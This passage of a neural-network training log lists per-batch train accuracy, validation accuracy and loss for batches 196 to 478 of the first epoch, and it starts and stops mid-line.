Validation Accuracy: 0.900, Loss: 0.982\nEpoch 1 Batch 196/538 - Train Accuracy: 0.887, Validation Accuracy: 0.897, Loss: 0.980\nEpoch 1 Batch 197/538 - Train Accuracy: 0.910, Validation Accuracy: 0.887, Loss: 0.980\nEpoch 1 Batch 198/538 - Train Accuracy: 0.897, Validation Accuracy: 0.892, Loss: 0.955\nEpoch 1 Batch 199/538 - Train Accuracy: 0.898, Validation Accuracy: 0.892, Loss: 0.957\nEpoch 1 Batch 200/538 - Train Accuracy: 0.887, Validation Accuracy: 0.900, Loss: 1.015\nEpoch 1 Batch 201/538 - Train Accuracy: 0.888, Validation Accuracy: 0.892, Loss: 0.949\nEpoch 1 Batch 202/538 - Train Accuracy: 0.914, Validation Accuracy: 0.893, Loss: 0.983\nEpoch 1 Batch 203/538 - Train Accuracy: 0.887, Validation Accuracy: 0.890, Loss: 0.993\nEpoch 1 Batch 204/538 - Train Accuracy: 0.886, Validation Accuracy: 0.892, Loss: 0.993\nEpoch 1 Batch 205/538 - Train Accuracy: 0.912, Validation Accuracy: 0.894, Loss: 0.934\nEpoch 1 Batch 206/538 - Train Accuracy: 0.883, Validation Accuracy: 0.893, Loss: 0.959\nEpoch 1 Batch 207/538 - Train Accuracy: 0.896, Validation Accuracy: 0.894, Loss: 0.965\nEpoch 1 Batch 208/538 - Train Accuracy: 0.898, Validation Accuracy: 0.887, Loss: 1.009\nEpoch 1 Batch 209/538 - Train Accuracy: 0.919, Validation Accuracy: 0.887, Loss: 0.944\nEpoch 1 Batch 210/538 - Train Accuracy: 0.894, Validation Accuracy: 0.882, Loss: 1.005\nEpoch 1 Batch 211/538 - Train Accuracy: 0.907, Validation Accuracy: 0.882, Loss: 1.010\nEpoch 1 Batch 212/538 - Train Accuracy: 0.891, Validation Accuracy: 0.879, Loss: 1.001\nEpoch 1 Batch 213/538 - Train Accuracy: 0.916, Validation Accuracy: 0.881, Loss: 0.983\nEpoch 1 Batch 214/538 - Train Accuracy: 0.904, Validation Accuracy: 0.884, Loss: 0.948\nEpoch 1 Batch 215/538 - Train Accuracy: 0.912, Validation Accuracy: 0.881, Loss: 0.984\nEpoch 1 Batch 216/538 - Train Accuracy: 0.887, Validation Accuracy: 0.884, Loss: 0.951\nEpoch 1 Batch 217/538 - Train Accuracy: 0.898, Validation Accuracy: 0.884, Loss: 0.953\nEpoch 1 Batch 218/538 - Train Accuracy: 0.902, Validation Accuracy: 0.879, Loss: 0.964\nEpoch 1 Batch 219/538 - Train Accuracy: 0.868, Validation Accuracy: 0.887, Loss: 0.962\nEpoch 1 Batch 220/538 - Train Accuracy: 0.892, Validation Accuracy: 0.887, Loss: 0.954\nEpoch 1 Batch 221/538 - Train Accuracy: 0.918, Validation Accuracy: 0.887, Loss: 0.990\nEpoch 1 Batch 222/538 - Train Accuracy: 0.889, Validation Accuracy: 0.896, Loss: 0.937\nEpoch 1 Batch 223/538 - Train Accuracy: 0.891, Validation Accuracy: 0.885, Loss: 1.016\nEpoch 1 Batch 224/538 - Train Accuracy: 0.894, Validation Accuracy: 0.884, Loss: 0.970\nEpoch 1 Batch 225/538 - Train Accuracy: 0.914, Validation Accuracy: 0.887, Loss: 1.010\nEpoch 1 Batch 226/538 - Train Accuracy: 0.909, Validation Accuracy: 0.898, Loss: 0.967\nEpoch 1 Batch 227/538 - Train Accuracy: 0.922, Validation Accuracy: 0.893, Loss: 0.944\nEpoch 1 Batch 228/538 - Train Accuracy: 0.891, Validation Accuracy: 0.897, Loss: 0.965\nEpoch 1 Batch 229/538 - Train Accuracy: 0.911, Validation Accuracy: 0.904, Loss: 0.959\nEpoch 1 Batch 230/538 - Train Accuracy: 0.891, Validation Accuracy: 0.894, Loss: 0.962\nEpoch 1 Batch 231/538 - Train Accuracy: 0.894, Validation Accuracy: 0.892, Loss: 1.000\nEpoch 1 Batch 232/538 - Train Accuracy: 0.902, Validation Accuracy: 0.902, Loss: 0.971\nEpoch 1 Batch 233/538 - Train Accuracy: 0.911, Validation Accuracy: 0.899, Loss: 0.948\nEpoch 1 Batch 234/538 - Train Accuracy: 0.905, Validation Accuracy: 0.894, Loss: 0.982\nEpoch 1 Batch 235/538 - Train Accuracy: 0.903, Validation Accuracy: 0.893, Loss: 0.973\nEpoch 1 Batch 236/538 - Train Accuracy: 0.886, Validation Accuracy: 0.879, Loss: 1.004\nEpoch 1 Batch 237/538 - Train Accuracy: 0.911, Validation Accuracy: 0.888, Loss: 0.948\nEpoch 1 Batch 238/538 - Train Accuracy: 0.937, Validation Accuracy: 0.895, Loss: 0.986\nEpoch 1 Batch 239/538 - Train Accuracy: 0.895, Validation Accuracy: 0.908, Loss: 0.968\nEpoch 1 Batch 240/538 - Train Accuracy: 0.920, Validation Accuracy: 0.910, Loss: 0.949\nEpoch 1 Batch 241/538 - Train Accuracy: 0.896, Validation Accuracy: 0.912, Loss: 0.961\nEpoch 1 Batch 242/538 - Train Accuracy: 0.920, Validation Accuracy: 0.904, Loss: 0.965\nEpoch 1 Batch 243/538 - Train Accuracy: 0.921, Validation Accuracy: 0.898, Loss: 0.971\nEpoch 1 Batch 244/538 - Train Accuracy: 0.903, Validation Accuracy: 0.896, Loss: 0.980\nEpoch 1 Batch 245/538 - Train Accuracy: 0.904, Validation Accuracy: 0.900, Loss: 0.958\nEpoch 1 Batch 246/538 - Train Accuracy: 0.906, Validation Accuracy: 0.900, Loss: 0.986\nEpoch 1 Batch 247/538 - Train Accuracy: 0.885, Validation Accuracy: 0.891, Loss: 0.918\nEpoch 1 Batch 248/538 - Train Accuracy: 0.910, Validation Accuracy: 0.898, Loss: 1.000\nEpoch 1 Batch 249/538 - Train Accuracy: 0.905, Validation Accuracy: 0.902, Loss: 0.988\nEpoch 1 Batch 250/538 - Train Accuracy: 0.912, Validation Accuracy: 0.904, Loss: 0.979\nEpoch 1 Batch 251/538 - Train Accuracy: 0.910, Validation Accuracy: 0.896, Loss: 0.986\nEpoch 1 Batch 252/538 - Train Accuracy: 0.920, Validation Accuracy: 0.897, Loss: 0.964\nEpoch 1 Batch 253/538 - Train Accuracy: 0.892, Validation Accuracy: 0.894, Loss: 0.967\nEpoch 1 Batch 254/538 - Train Accuracy: 0.879, Validation Accuracy: 0.895, Loss: 0.984\nEpoch 1 Batch 255/538 - Train Accuracy: 0.900, Validation Accuracy: 0.898, Loss: 0.930\nEpoch 1 Batch 256/538 - Train Accuracy: 0.882, Validation Accuracy: 0.895, Loss: 0.968\nEpoch 1 Batch 257/538 - Train Accuracy: 0.914, Validation Accuracy: 0.896, Loss: 0.942\nEpoch 1 Batch 258/538 - Train Accuracy: 0.908, Validation Accuracy: 0.892, Loss: 0.961\nEpoch 1 Batch 259/538 - Train Accuracy: 0.918, Validation Accuracy: 0.894, Loss: 0.977\nEpoch 1 Batch 260/538 - Train Accuracy: 0.887, Validation Accuracy: 0.903, Loss: 1.001\nEpoch 1 Batch 261/538 - Train Accuracy: 0.899, Validation Accuracy: 0.899, Loss: 0.970\nEpoch 1 Batch 262/538 - Train Accuracy: 0.918, Validation Accuracy: 0.894, Loss: 0.978\nEpoch 1 Batch 263/538 - Train Accuracy: 0.903, Validation Accuracy: 0.903, Loss: 0.984\nEpoch 1 Batch 264/538 - Train Accuracy: 0.892, Validation Accuracy: 0.911, Loss: 0.997\nEpoch 1 Batch 265/538 - Train Accuracy: 0.911, Validation Accuracy: 0.905, Loss: 0.945\nEpoch 1 Batch 266/538 - Train Accuracy: 0.900, Validation Accuracy: 0.897, Loss: 0.985\nEpoch 1 Batch 267/538 - Train Accuracy: 0.901, Validation Accuracy: 0.898, Loss: 0.932\nEpoch 1 Batch 268/538 - Train Accuracy: 0.930, Validation Accuracy: 0.904, Loss: 0.925\nEpoch 1 Batch 269/538 - Train Accuracy: 0.907, Validation Accuracy: 0.914, Loss: 0.973\nEpoch 1 Batch 270/538 - Train Accuracy: 0.911, Validation Accuracy: 0.912, Loss: 0.978\nEpoch 1 Batch 271/538 - Train Accuracy: 0.911, Validation Accuracy: 0.909, Loss: 0.925\nEpoch 1 Batch 272/538 - Train Accuracy: 0.893, Validation Accuracy: 0.903, Loss: 0.968\nEpoch 1 Batch 273/538 - Train Accuracy: 0.903, Validation Accuracy: 0.900, Loss: 0.980\nEpoch 1 Batch 274/538 - Train Accuracy: 0.875, Validation Accuracy: 0.898, Loss: 0.975\nEpoch 1 Batch 275/538 - Train Accuracy: 0.890, Validation Accuracy: 0.886, Loss: 0.956\nEpoch 1 Batch 276/538 - Train Accuracy: 0.905, Validation Accuracy: 0.893, Loss: 0.942\nEpoch 1 Batch 277/538 - Train Accuracy: 0.909, Validation Accuracy: 0.889, Loss: 0.979\nEpoch 1 Batch 278/538 - Train Accuracy: 0.912, Validation Accuracy: 0.888, Loss: 0.959\nEpoch 1 Batch 279/538 - Train Accuracy: 0.925, Validation Accuracy: 0.891, Loss: 0.938\nEpoch 1 Batch 280/538 - Train Accuracy: 0.924, Validation Accuracy: 0.890, Loss: 0.978\nEpoch 1 Batch 281/538 - Train Accuracy: 0.923, Validation Accuracy: 0.886, Loss: 0.990\nEpoch 1 Batch 282/538 - Train Accuracy: 0.913, Validation Accuracy: 0.891, Loss: 1.023\nEpoch 1 Batch 283/538 - Train Accuracy: 0.905, Validation Accuracy: 0.890, Loss: 0.940\nEpoch 1 Batch 284/538 - Train Accuracy: 0.911, Validation Accuracy: 0.893, Loss: 0.951\nEpoch 1 Batch 285/538 - Train Accuracy: 0.904, Validation Accuracy: 0.898, Loss: 0.918\nEpoch 1 Batch 286/538 - Train Accuracy: 0.900, Validation Accuracy: 0.901, Loss: 0.957\nEpoch 1 Batch 287/538 - Train Accuracy: 0.936, Validation Accuracy: 0.913, Loss: 0.949\nEpoch 1 Batch 288/538 - Train Accuracy: 0.915, Validation Accuracy: 0.910, Loss: 0.958\nEpoch 1 Batch 289/538 - Train Accuracy: 0.914, Validation Accuracy: 0.911, Loss: 0.935\nEpoch 1 Batch 290/538 - Train Accuracy: 0.921, Validation Accuracy: 0.893, Loss: 0.952\nEpoch 1 Batch 291/538 - Train Accuracy: 0.918, Validation Accuracy: 0.890, Loss: 0.971\nEpoch 1 Batch 292/538 - Train Accuracy: 0.919, Validation Accuracy: 0.892, Loss: 0.923\nEpoch 1 Batch 293/538 - Train Accuracy: 0.909, Validation Accuracy: 0.901, Loss: 0.936\nEpoch 1 Batch 294/538 - Train Accuracy: 0.899, Validation Accuracy: 0.900, Loss: 0.946\nEpoch 1 Batch 295/538 - Train Accuracy: 0.903, Validation Accuracy: 0.898, Loss: 0.982\nEpoch 1 Batch 296/538 - Train Accuracy: 0.902, Validation Accuracy: 0.897, Loss: 0.980\nEpoch 1 Batch 297/538 - Train Accuracy: 0.925, Validation Accuracy: 0.904, Loss: 0.983\nEpoch 1 Batch 298/538 - Train Accuracy: 0.906, Validation Accuracy: 0.913, Loss: 0.966\nEpoch 1 Batch 299/538 - Train Accuracy: 0.903, Validation Accuracy: 0.911, Loss: 0.988\nEpoch 1 Batch 300/538 - Train Accuracy: 0.906, Validation Accuracy: 0.913, Loss: 0.945\nEpoch 1 Batch 301/538 - Train Accuracy: 0.907, Validation Accuracy: 0.920, Loss: 0.968\nEpoch 1 Batch 302/538 - Train Accuracy: 0.916, Validation Accuracy: 0.909, Loss: 1.025\nEpoch 1 Batch 303/538 - Train Accuracy: 0.926, Validation Accuracy: 0.898, Loss: 0.910\nEpoch 1 Batch 304/538 - Train Accuracy: 0.911, Validation Accuracy: 0.897, Loss: 0.957\nEpoch 1 Batch 305/538 - Train Accuracy: 0.916, Validation Accuracy: 0.902, Loss: 0.924\nEpoch 1 Batch 306/538 - Train Accuracy: 0.916, Validation Accuracy: 0.903, Loss: 0.929\nEpoch 1 Batch 307/538 - Train Accuracy: 0.933, Validation Accuracy: 0.903, Loss: 0.925\nEpoch 1 Batch 308/538 - Train Accuracy: 0.930, Validation Accuracy: 0.901, Loss: 0.961\nEpoch 1 Batch 309/538 - Train Accuracy: 0.916, Validation Accuracy: 0.894, Loss: 0.921\nEpoch 1 Batch 310/538 - Train Accuracy: 0.941, Validation Accuracy: 0.900, Loss: 0.933\nEpoch 1 Batch 311/538 - Train Accuracy: 0.905, Validation Accuracy: 0.896, Loss: 0.976\nEpoch 1 Batch 312/538 - Train Accuracy: 0.911, Validation Accuracy: 0.900, Loss: 0.979\nEpoch 1 Batch 313/538 - Train Accuracy: 0.923, Validation Accuracy: 0.903, Loss: 0.962\nEpoch 1 Batch 314/538 - Train Accuracy: 0.913, Validation Accuracy: 0.906, Loss: 0.947\nEpoch 1 Batch 315/538 - Train Accuracy: 0.920, Validation Accuracy: 0.902, Loss: 0.909\nEpoch 1 Batch 316/538 - Train Accuracy: 0.914, Validation Accuracy: 0.901, Loss: 0.938\nEpoch 1 Batch 317/538 - Train Accuracy: 0.915, Validation Accuracy: 0.905, Loss: 0.965\nEpoch 1 Batch 318/538 - Train Accuracy: 0.895, Validation Accuracy: 0.910, Loss: 0.937\nEpoch 1 Batch 319/538 - Train Accuracy: 0.910, Validation Accuracy: 0.913, Loss: 0.969\nEpoch 1 Batch 320/538 - Train Accuracy: 0.916, Validation Accuracy: 0.910, Loss: 0.996\nEpoch 1 Batch 321/538 - Train Accuracy: 0.900, Validation Accuracy: 0.903, Loss: 0.918\nEpoch 1 Batch 322/538 - Train Accuracy: 0.915, Validation Accuracy: 0.902, Loss: 0.972\nEpoch 1 Batch 323/538 - Train Accuracy: 0.928, Validation Accuracy: 0.916, Loss: 0.949\nEpoch 1 Batch 324/538 - Train Accuracy: 0.911, Validation Accuracy: 0.910, Loss: 0.982\nEpoch 1 Batch 325/538 - Train Accuracy: 0.919, Validation Accuracy: 0.908, Loss: 0.967\nEpoch 1 Batch 326/538 - Train Accuracy: 0.926, Validation Accuracy: 0.906, Loss: 0.921\nEpoch 1 Batch 327/538 - Train Accuracy: 0.912, Validation Accuracy: 0.912, Loss: 0.987\nEpoch 1 Batch 328/538 - Train Accuracy: 0.926, Validation Accuracy: 0.924, Loss: 0.943\nEpoch 1 Batch 329/538 - Train Accuracy: 0.933, Validation Accuracy: 0.909, Loss: 0.915\nEpoch 1 Batch 330/538 - Train Accuracy: 0.925, Validation Accuracy: 0.900, Loss: 0.891\nEpoch 1 Batch 331/538 - Train Accuracy: 0.927, Validation Accuracy: 0.901, Loss: 0.950\nEpoch 1 Batch 332/538 - Train Accuracy: 0.911, Validation Accuracy: 0.898, Loss: 0.948\nEpoch 1 Batch 333/538 - Train Accuracy: 0.923, Validation Accuracy: 0.897, Loss: 0.914\nEpoch 1 Batch 334/538 - Train Accuracy: 0.924, Validation Accuracy: 0.892, Loss: 0.958\nEpoch 1 Batch 335/538 - Train Accuracy: 0.918, Validation Accuracy: 0.910, Loss: 0.930\nEpoch 1 Batch 336/538 - Train Accuracy: 0.919, Validation Accuracy: 0.912, Loss: 0.931\nEpoch 1 Batch 337/538 - Train Accuracy: 0.918, Validation Accuracy: 0.915, Loss: 0.981\nEpoch 1 Batch 338/538 - Train Accuracy: 0.896, Validation Accuracy: 0.920, Loss: 0.962\nEpoch 1 Batch 339/538 - Train Accuracy: 0.915, Validation Accuracy: 0.912, Loss: 0.953\nEpoch 1 Batch 340/538 - Train Accuracy: 0.910, Validation Accuracy: 0.916, Loss: 0.914\nEpoch 1 Batch 341/538 - Train Accuracy: 0.919, Validation Accuracy: 0.912, Loss: 0.936\nEpoch 1 Batch 342/538 - Train Accuracy: 0.911, Validation Accuracy: 0.918, Loss: 0.937\nEpoch 1 Batch 343/538 - Train Accuracy: 0.926, Validation Accuracy: 0.915, Loss: 0.941\nEpoch 1 Batch 344/538 - Train Accuracy: 0.931, Validation Accuracy: 0.909, Loss: 0.923\nEpoch 1 Batch 345/538 - Train Accuracy: 0.913, Validation Accuracy: 0.911, Loss: 0.963\nEpoch 1 Batch 346/538 - Train Accuracy: 0.897, Validation Accuracy: 0.916, Loss: 0.960\nEpoch 1 Batch 347/538 - Train Accuracy: 0.918, Validation Accuracy: 0.915, Loss: 0.900\nEpoch 1 Batch 348/538 - Train Accuracy: 0.916, Validation Accuracy: 0.914, Loss: 0.906\nEpoch 1 Batch 349/538 - Train Accuracy: 0.922, Validation Accuracy: 0.909, Loss: 0.972\nEpoch 1 Batch 350/538 - Train Accuracy: 0.909, Validation Accuracy: 0.905, Loss: 0.962\nEpoch 1 Batch 351/538 - Train Accuracy: 0.908, Validation Accuracy: 0.906, Loss: 0.941\nEpoch 1 Batch 352/538 - Train Accuracy: 0.904, Validation Accuracy: 0.918, Loss: 0.941\nEpoch 1 Batch 353/538 - Train Accuracy: 0.888, Validation Accuracy: 0.919, Loss: 0.974\nEpoch 1 Batch 354/538 - Train Accuracy: 0.912, Validation Accuracy: 0.921, Loss: 0.977\nEpoch 1 Batch 355/538 - Train Accuracy: 0.924, Validation Accuracy: 0.922, Loss: 0.992\nEpoch 1 Batch 356/538 - Train Accuracy: 0.925, Validation Accuracy: 0.919, Loss: 0.972\nEpoch 1 Batch 357/538 - Train Accuracy: 0.921, Validation Accuracy: 0.915, Loss: 0.967\nEpoch 1 Batch 358/538 - Train Accuracy: 0.922, Validation Accuracy: 0.926, Loss: 0.930\nEpoch 1 Batch 359/538 - Train Accuracy: 0.911, Validation Accuracy: 0.928, Loss: 0.954\nEpoch 1 Batch 360/538 - Train Accuracy: 0.909, Validation Accuracy: 0.925, Loss: 0.916\nEpoch 1 Batch 361/538 - Train Accuracy: 0.928, Validation Accuracy: 0.923, Loss: 0.955\nEpoch 1 Batch 362/538 - Train Accuracy: 0.933, Validation Accuracy: 0.924, Loss: 0.931\nEpoch 1 Batch 363/538 - Train Accuracy: 0.914, Validation Accuracy: 0.917, Loss: 0.931\nEpoch 1 Batch 364/538 - Train Accuracy: 0.908, Validation Accuracy: 0.920, Loss: 0.970\nEpoch 1 Batch 365/538 - Train Accuracy: 0.914, Validation Accuracy: 0.922, Loss: 0.998\nEpoch 1 Batch 366/538 - Train Accuracy: 0.932, Validation Accuracy: 0.918, Loss: 0.952\nEpoch 1 Batch 367/538 - Train Accuracy: 0.941, Validation Accuracy: 0.928, Loss: 0.875\nEpoch 1 Batch 368/538 - Train Accuracy: 0.935, Validation Accuracy: 0.918, Loss: 0.905\nEpoch 1 Batch 369/538 - Train Accuracy: 0.933, Validation Accuracy: 0.921, Loss: 0.944\nEpoch 1 Batch 370/538 - Train Accuracy: 0.918, Validation Accuracy: 0.922, Loss: 0.980\nEpoch 1 Batch 371/538 - Train Accuracy: 0.928, Validation Accuracy: 0.920, Loss: 0.932\nEpoch 1 Batch 372/538 - Train Accuracy: 0.923, Validation Accuracy: 0.919, Loss: 0.965\nEpoch 1 Batch 373/538 - Train Accuracy: 0.913, Validation Accuracy: 0.919, Loss: 0.914\nEpoch 1 Batch 374/538 - Train Accuracy: 0.916, Validation Accuracy: 0.917, Loss: 0.929\nEpoch 1 Batch 375/538 - Train Accuracy: 0.916, Validation Accuracy: 0.921, Loss: 0.921\nEpoch 1 Batch 376/538 - Train Accuracy: 0.916, Validation Accuracy: 0.918, Loss: 0.938\nEpoch 1 Batch 377/538 - Train Accuracy: 0.932, Validation Accuracy: 0.917, Loss: 0.918\nEpoch 1 Batch 378/538 - Train Accuracy: 0.921, Validation Accuracy: 0.915, Loss: 0.915\nEpoch 1 Batch 379/538 - Train Accuracy: 0.916, Validation Accuracy: 0.908, Loss: 0.934\nEpoch 1 Batch 380/538 - Train Accuracy: 0.909, Validation Accuracy: 0.918, Loss: 0.925\nEpoch 1 Batch 381/538 - Train Accuracy: 0.922, Validation Accuracy: 0.919, Loss: 0.940\nEpoch 1 Batch 382/538 - Train Accuracy: 0.913, Validation Accuracy: 0.924, Loss: 0.922\nEpoch 1 Batch 383/538 - Train Accuracy: 0.930, Validation Accuracy: 0.926, Loss: 0.946\nEpoch 1 Batch 384/538 - Train Accuracy: 0.906, Validation Accuracy: 0.931, Loss: 0.986\nEpoch 1 Batch 385/538 - Train Accuracy: 0.931, Validation Accuracy: 0.929, Loss: 0.936\nEpoch 1 Batch 386/538 - Train Accuracy: 0.925, Validation Accuracy: 0.920, Loss: 0.919\nEpoch 1 Batch 387/538 - Train Accuracy: 0.914, Validation Accuracy: 0.921, Loss: 0.954\nEpoch 1 Batch 388/538 - Train Accuracy: 0.923, Validation Accuracy: 0.927, Loss: 0.956\nEpoch 1 Batch 389/538 - Train Accuracy: 0.868, Validation Accuracy: 0.930, Loss: 0.933\nEpoch 1 Batch 390/538 - Train Accuracy: 0.920, Validation Accuracy: 0.919, Loss: 0.928\nEpoch 1 Batch 391/538 - Train Accuracy: 0.928, Validation Accuracy: 0.915, Loss: 0.954\nEpoch 1 Batch 392/538 - Train Accuracy: 0.895, Validation Accuracy: 0.912, Loss: 0.936\nEpoch 1 Batch 393/538 - Train Accuracy: 0.921, Validation Accuracy: 0.913, Loss: 0.895\nEpoch 1 Batch 394/538 - Train Accuracy: 0.900, Validation Accuracy: 0.908, Loss: 0.959\nEpoch 1 Batch 395/538 - Train Accuracy: 0.913, Validation Accuracy: 0.912, Loss: 0.918\nEpoch 1 Batch 396/538 - Train Accuracy: 0.906, Validation Accuracy: 0.909, Loss: 0.942\nEpoch 1 Batch 397/538 - Train Accuracy: 0.929, Validation Accuracy: 0.904, Loss: 0.942\nEpoch 1 Batch 398/538 - Train Accuracy: 0.931, Validation Accuracy: 0.910, Loss: 0.962\nEpoch 1 Batch 399/538 - Train Accuracy: 0.887, Validation Accuracy: 0.909, Loss: 0.965\nEpoch 1 Batch 400/538 - Train Accuracy: 0.909, Validation Accuracy: 0.915, Loss: 0.980\nEpoch 1 Batch 401/538 - Train Accuracy: 0.931, Validation Accuracy: 0.914, Loss: 0.951\nEpoch 1 Batch 402/538 - Train Accuracy: 0.921, Validation Accuracy: 0.911, Loss: 0.953\nEpoch 1 Batch 403/538 - Train Accuracy: 0.936, Validation Accuracy: 0.902, Loss: 0.943\nEpoch 1 Batch 404/538 - Train Accuracy: 0.907, Validation Accuracy: 0.901, Loss: 0.952\nEpoch 1 Batch 405/538 - Train Accuracy: 0.923, Validation Accuracy: 0.905, Loss: 0.950\nEpoch 1 Batch 406/538 - Train Accuracy: 0.900, Validation Accuracy: 0.907, Loss: 0.924\nEpoch 1 Batch 407/538 - Train Accuracy: 0.932, Validation Accuracy: 0.910, Loss: 0.961\nEpoch 1 Batch 408/538 - Train Accuracy: 0.929, Validation Accuracy: 0.915, Loss: 0.923\nEpoch 1 Batch 409/538 - Train Accuracy: 0.903, Validation Accuracy: 0.914, Loss: 0.932\nEpoch 1 Batch 410/538 - Train Accuracy: 0.935, Validation Accuracy: 0.902, Loss: 0.992\nEpoch 1 Batch 411/538 - Train Accuracy: 0.928, Validation Accuracy: 0.907, Loss: 0.927\nEpoch 1 Batch 412/538 - Train Accuracy: 0.921, Validation Accuracy: 0.901, Loss: 0.878\nEpoch 1 Batch 413/538 - Train Accuracy: 0.903, Validation Accuracy: 0.900, Loss: 0.942\nEpoch 1 Batch 414/538 - Train Accuracy: 0.866, Validation Accuracy: 0.903, Loss: 0.972\nEpoch 1 Batch 415/538 - Train Accuracy: 0.904, Validation Accuracy: 0.908, Loss: 0.945\nEpoch 1 Batch 416/538 - Train Accuracy: 0.928, Validation Accuracy: 0.909, Loss: 0.926\nEpoch 1 Batch 417/538 - Train Accuracy: 0.939, Validation Accuracy: 0.911, Loss: 0.953\nEpoch 1 Batch 418/538 - Train Accuracy: 0.916, Validation Accuracy: 0.915, Loss: 0.903\nEpoch 1 Batch 419/538 - Train Accuracy: 0.923, Validation Accuracy: 0.917, Loss: 0.907\nEpoch 1 Batch 420/538 - Train Accuracy: 0.936, Validation Accuracy: 0.916, Loss: 0.961\nEpoch 1 Batch 421/538 - Train Accuracy: 0.919, Validation Accuracy: 0.914, Loss: 0.887\nEpoch 1 Batch 422/538 - Train Accuracy: 0.912, Validation Accuracy: 0.913, Loss: 0.962\nEpoch 1 Batch 423/538 - Train Accuracy: 0.917, Validation Accuracy: 0.911, Loss: 0.953\nEpoch 1 Batch 424/538 - Train Accuracy: 0.911, Validation Accuracy: 0.913, Loss: 0.954\nEpoch 1 Batch 425/538 - Train Accuracy: 0.911, Validation Accuracy: 0.914, Loss: 0.979\nEpoch 1 Batch 426/538 - Train Accuracy: 0.939, Validation Accuracy: 0.913, Loss: 0.927\nEpoch 1 Batch 427/538 - Train Accuracy: 0.912, Validation Accuracy: 0.911, Loss: 0.938\nEpoch 1 Batch 428/538 - Train Accuracy: 0.935, Validation Accuracy: 0.908, Loss: 0.938\nEpoch 1 Batch 429/538 - Train Accuracy: 0.935, Validation Accuracy: 0.912, Loss: 0.919\nEpoch 1 Batch 430/538 - Train Accuracy: 0.919, Validation Accuracy: 0.911, Loss: 0.958\nEpoch 1 Batch 431/538 - Train Accuracy: 0.923, Validation Accuracy: 0.911, Loss: 0.909\nEpoch 1 Batch 432/538 - Train Accuracy: 0.916, Validation Accuracy: 0.904, Loss: 0.938\nEpoch 1 Batch 433/538 - Train Accuracy: 0.916, Validation Accuracy: 0.897, Loss: 0.926\nEpoch 1 Batch 434/538 - Train Accuracy: 0.914, Validation Accuracy: 0.898, Loss: 0.942\nEpoch 1 Batch 435/538 - Train Accuracy: 0.922, Validation Accuracy: 0.895, Loss: 0.964\nEpoch 1 Batch 436/538 - Train Accuracy: 0.911, Validation Accuracy: 0.894, Loss: 0.966\nEpoch 1 Batch 437/538 - Train Accuracy: 0.921, Validation Accuracy: 0.892, Loss: 0.949\nEpoch 1 Batch 438/538 - Train Accuracy: 0.929, Validation Accuracy: 0.894, Loss: 0.961\nEpoch 1 Batch 439/538 - Train Accuracy: 0.939, Validation Accuracy: 0.903, Loss: 0.915\nEpoch 1 Batch 440/538 - Train Accuracy: 0.930, Validation Accuracy: 0.904, Loss: 0.952\nEpoch 1 Batch 441/538 - Train Accuracy: 0.920, Validation Accuracy: 0.903, Loss: 0.949\nEpoch 1 Batch 442/538 - Train Accuracy: 0.911, Validation Accuracy: 0.903, Loss: 0.921\nEpoch 1 Batch 443/538 - Train Accuracy: 0.908, Validation Accuracy: 0.906, Loss: 0.947\nEpoch 1 Batch 444/538 - Train Accuracy: 0.923, Validation Accuracy: 0.904, Loss: 0.974\nEpoch 1 Batch 445/538 - Train Accuracy: 0.935, Validation Accuracy: 0.900, Loss: 0.929\nEpoch 1 Batch 446/538 - Train Accuracy: 0.938, Validation Accuracy: 0.901, Loss: 0.927\nEpoch 1 Batch 447/538 - Train Accuracy: 0.911, Validation Accuracy: 0.902, Loss: 0.910\nEpoch 1 Batch 448/538 - Train Accuracy: 0.916, Validation Accuracy: 0.903, Loss: 0.926\nEpoch 1 Batch 449/538 - Train Accuracy: 0.937, Validation Accuracy: 0.910, Loss: 0.936\nEpoch 1 Batch 450/538 - Train Accuracy: 0.908, Validation Accuracy: 0.908, Loss: 0.945\nEpoch 1 Batch 451/538 - Train Accuracy: 0.899, Validation Accuracy: 0.907, Loss: 0.983\nEpoch 1 Batch 452/538 - Train Accuracy: 0.920, Validation Accuracy: 0.896, Loss: 0.909\nEpoch 1 Batch 453/538 - Train Accuracy: 0.936, Validation Accuracy: 0.912, Loss: 0.921\nEpoch 1 Batch 454/538 - Train Accuracy: 0.921, Validation Accuracy: 0.914, Loss: 0.936\nEpoch 1 Batch 455/538 - Train Accuracy: 0.925, Validation Accuracy: 0.917, Loss: 0.891\nEpoch 1 Batch 456/538 - Train Accuracy: 0.921, Validation Accuracy: 0.915, Loss: 0.955\nEpoch 1 Batch 457/538 - Train Accuracy: 0.919, Validation Accuracy: 0.919, Loss: 0.925\nEpoch 1 Batch 458/538 - Train Accuracy: 0.916, Validation Accuracy: 0.919, Loss: 0.892\nEpoch 1 Batch 459/538 - Train Accuracy: 0.911, Validation Accuracy: 0.913, Loss: 0.935\nEpoch 1 Batch 460/538 - Train Accuracy: 0.901, Validation Accuracy: 0.912, Loss: 0.907\nEpoch 1 Batch 461/538 - Train Accuracy: 0.915, Validation Accuracy: 0.909, Loss: 0.964\nEpoch 1 Batch 462/538 - Train Accuracy: 0.916, Validation Accuracy: 0.915, Loss: 0.868\nEpoch 1 Batch 463/538 - Train Accuracy: 0.894, Validation Accuracy: 0.922, Loss: 0.977\nEpoch 1 Batch 464/538 - Train Accuracy: 0.932, Validation Accuracy: 0.920, Loss: 0.949\nEpoch 1 Batch 465/538 - Train Accuracy: 0.919, Validation Accuracy: 0.916, Loss: 0.973\nEpoch 1 Batch 466/538 - Train Accuracy: 0.916, Validation Accuracy: 0.911, Loss: 0.934\nEpoch 1 Batch 467/538 - Train Accuracy: 0.924, Validation Accuracy: 0.911, Loss: 0.956\nEpoch 1 Batch 468/538 - Train Accuracy: 0.937, Validation Accuracy: 0.913, Loss: 0.961\nEpoch 1 Batch 469/538 - Train Accuracy: 0.927, Validation Accuracy: 0.915, Loss: 0.933\nEpoch 1 Batch 470/538 - Train Accuracy: 0.911, Validation Accuracy: 0.913, Loss: 0.948\nEpoch 1 Batch 471/538 - Train Accuracy: 0.934, Validation Accuracy: 0.907, Loss: 0.917\nEpoch 1 Batch 472/538 - Train Accuracy: 0.954, Validation Accuracy: 0.911, Loss: 0.923\nEpoch 1 Batch 473/538 - Train Accuracy: 0.903, Validation Accuracy: 0.917, Loss: 0.960\nEpoch 1 Batch 474/538 - Train Accuracy: 0.927, Validation Accuracy: 0.912, Loss: 0.911\nEpoch 1 Batch 475/538 - Train Accuracy: 0.920, Validation Accuracy: 0.914, Loss: 0.972\nEpoch 1 Batch 476/538 - Train Accuracy: 0.920, Validation Accuracy: 0.907, Loss: 0.921\nEpoch 1 Batch 477/538 - Train Accuracy: 0.904, Validation Accuracy: 0.903, Loss: 0.933\nEpoch 1 Batch 478/538 - Train Accuracy: 0.931, 